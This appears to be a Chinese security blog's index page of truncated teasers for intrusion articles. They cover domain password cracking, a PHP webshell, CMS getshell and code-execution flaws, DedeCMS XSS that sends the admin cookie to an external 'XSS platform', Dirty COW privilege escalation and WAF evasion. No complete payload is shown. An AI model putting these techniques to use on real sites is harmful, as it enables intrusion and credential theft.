网络渗透漏洞

离线破win2003域账号密码(更新域数据库不在默认路径的情况)

一 实验环境:windows server2003,域环境 搭建方法很简单,百度搜搜。     新建一个域用户xiaocai,密码设为 123abcABC ...继续阅读 »
网络渗透漏洞

一个带黑页的一句话php代码

? 1 2 3 4 ...继续阅读 »
网络渗透漏洞

Metinfo5.3.10版本Getshell

好久没代码审计了,今早上cheery师傅跟我说了一下这个洞,尽管这个洞已经被修复了,但是还是比较新的,看了下没那么难,就简单写下步骤: 0x01 首先看一下配置的文件include/common.inc.php ...继续阅读 »
网络渗透漏洞

WEB代码审校ASP0day挖掘及代码防御

教程介绍 面对脚本“伪黑客”对网站的种种攻击威胁,代码审校工程师的作用尤为重要 通过深入发掘WEB程序漏洞(0day)并通过合理可靠的代码防御来阻止攻击,确保网站程序安全。 学习者需提前掌握ASP网络编程语言,数据库指令...继续阅读 »
网络渗透漏洞

灰盒测试之织梦dedecms 5.7 官网最新版 Getshell

很久之前一直用dedecms做二次开发、直接做模版就好了,偶尔要写原生的php代码与dede交互,简单的了解了下里面的model,并未深入,dedecms漏洞那么多、、、能不能也找出一个漏洞呢。 下载了官网最新的程序研究了下。 在前台有个提交友...继续阅读 »
网络渗透漏洞

Dedecms通用XSS+CSRF#前台获取管理员cookie

Dedecms的后台搜索的地方存在反射xss,但是我们可以构造src地址,让他加载代码。 这里我利用xss平台来外部加载一串js代码来获取cookie并发送到xss平台 payload: <script src=h...继续阅读 »
网络渗透漏洞

PHPCMS V9 版本后台设计缺陷导致任意代码执行漏洞

0x01 背景 由于默认安装后需要超级管理员权限,故该漏洞很鸡肋,但感觉应该会在其它cms中也存在,所以主要分享下挖掘思路~ PS:使用的测试环境是php5.6(已经移除gpc选项) ...继续阅读 »
网络渗透漏洞

深入解读脏牛Linux本地提权漏洞(CVE-2016-5195)

摘要:0x00 概述 该漏洞是Linux的一个本地提权漏洞,发现者是Phil Oester,影响=2.6.22的所有Linux内核版本,修复时间是2016年10月18号。该漏洞的原因是get_user_page内核函数在处理Copy-on-Write(以下...继续阅读 »
网络渗透漏洞

通达OA前台getshell

OA的强大现在大家都知道,首先证明自己是最新版 昨天才下载的源码程序,下载后发现存在有zend加密于是用软件批量解密方便审计 首先我先证明自己未登陆 于是getshell...继续阅读 »
网络渗透漏洞

渗透思路!适合入门学习

【前戏】 信息探测:主要是网站的脚本语言、数据库、搭建平台、操作系统、服务器IP、注册人信息、网站防护情况。 简单说一下这些信息的获取方式: 1.【目标站的脚本语言识别】 1-1 最简单的方法,在域名后面分别...继续阅读 »
网络渗透漏洞

无特征过安全狗/D盾/云锁/百度云等等

过不了,大家直接砍死他  就行 感谢大家的支持 ? 1 2 ...继续阅读 »